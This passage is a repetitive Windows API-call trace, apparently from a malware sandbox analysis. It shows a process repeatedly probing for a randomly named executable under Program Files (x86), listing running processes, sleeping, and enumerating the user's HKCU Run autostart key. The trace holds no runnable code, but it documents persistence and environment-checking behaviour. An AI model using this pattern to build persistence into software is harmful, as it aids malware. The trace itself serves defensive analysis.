NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0259.329] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0259.329] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0259.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0259.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0260.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0260.329] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0260.642] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0260.642] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0260.642] NtClose (Handle=0x14c) returned 0x0 [0260.642] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0260.642] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0260.643] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0260.643] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0260.643] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0260.643] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0260.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0260.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0261.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0261.435] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0261.453] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0261.453] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0261.453] NtClose (Handle=0x14c) returned 0x0 [0261.453] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0261.453] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0261.453] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0261.453] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0261.453] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0261.454] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0261.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0261.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0261.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0261.556] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0261.670] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0261.670] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0261.670] NtClose (Handle=0x14c) returned 0x0 [0261.670] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0261.670] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0261.671] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0261.671] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0261.671] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0261.671] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0261.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0261.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0262.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0262.042] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0262.058] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0262.058] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0262.058] NtClose (Handle=0x14c) returned 0x0 [0262.058] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.058] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.058] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.058] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.058] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.058] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0262.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0262.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0262.149] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0262.165] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0262.165] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0262.165] NtClose (Handle=0x14c) returned 0x0 [0262.165] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.165] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.166] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.166] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.166] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.166] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0262.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0262.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0262.276] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0262.287] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0262.287] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0262.287] NtClose (Handle=0x14c) returned 0x0 [0262.287] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.287] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.288] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.288] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.288] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.288] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0262.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0262.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0262.385] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0262.396] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0262.396] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0262.396] NtClose (Handle=0x14c) returned 0x0 [0262.396] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.396] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.397] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.397] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.397] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.397] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0262.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0262.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0262.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0262.513] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0262.521] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0262.521] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0262.521] NtClose (Handle=0x14c) returned 0x0 